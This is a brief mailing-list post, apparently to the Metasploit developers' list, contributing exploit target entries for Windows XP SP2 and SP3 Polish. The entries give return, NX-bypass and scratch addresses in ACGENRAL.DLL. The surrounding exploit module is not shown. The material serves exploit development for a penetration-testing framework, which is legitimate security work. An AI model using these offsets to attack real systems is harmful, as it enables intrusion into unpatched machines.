Here you go,

[ 'Windows XP SP2 Polish (NX)',
    {
        'Ret' => 0x5942145f,
        'DisableNX' => 0x594216e2,
        'Scratch' => 0x00020408,
    }
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL


[ 'Windows XP SP3 Polish (NX)',
    {
        'Ret' => 0x5942153f,
        'DisableNX' => 0x594217c2,
        'Scratch' => 0x00020408,
    }

], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

P.S. Thanks for this awesome exploit
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to